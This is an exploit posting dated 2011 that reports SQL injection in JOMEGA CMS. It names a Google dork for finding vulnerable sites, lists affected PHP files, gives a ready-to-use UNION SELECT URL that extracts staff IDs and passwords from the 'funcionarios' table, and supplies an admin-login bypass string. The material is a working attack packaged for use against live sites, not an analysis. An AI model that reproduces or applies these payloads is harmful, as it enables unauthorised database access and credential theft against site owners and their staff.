[$] Exploit Title     : JOMEGA CMS SQL Injection
[$] Versions Affected : ALL
[$] Date              : 10-07-2011           
[$] Author            : MasterGipy
[$] Email             : mastergipy [at] gmail.com
[$] Bug               : SQL Injection
[$] Google Dork       : inurl:"showPG.php?Id="
 
[$] Vulnerable files:
  /showCACedit.php
  /showEVedit.php
  /showFQedit.php	
  /showFRedit.php
  /showFregedit.php
  /showIFedit.php
  /showNTedit.php
  /showPGedit.php
  /showRGedit.php
  /showRQedit.php


[$] Exploit
 
[+] http://[site]/showPG.php?Id=1  <- [SQL INJECTION]


[+] e.g. 
    http://example.pt/showPG.php?Id=-1'+union+all+select+1,(select+concat(cod_func,0x3a,password)+from+funcionarios)+,0x30,0x30,0x30,0x30,0x30+and+'1'='1

 

[#] The Admin Panel its vulnerable too.
[$] Vulnerable files:
  /gestor/login.php
  
  
[$] Exploit

[+] http://[site]/gestor/login.php?cod_func=LOL <- [BLIND SQL INJECTION]

[#] You can also bypass the username field using: ' OR '1'='1


 
[$] Greetings from PORTUGAL ^^